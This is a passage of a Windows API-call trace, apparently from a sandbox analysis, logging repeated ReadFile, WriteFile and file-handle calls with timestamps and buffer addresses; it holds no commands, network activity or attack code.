0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] GetFileType (hFile=0x50) returned 0x1 [0129.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.875] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.875] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.876] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.876] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] GetFileType (hFile=0x50) returned 0x1 [0129.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.876] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.877] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] GetFileType (hFile=0x50) returned 0x1 [0129.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.877] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.878] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.879] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.879] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.879] GetFileType (hFile=0x50) returned 0x1 [0129.879] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, 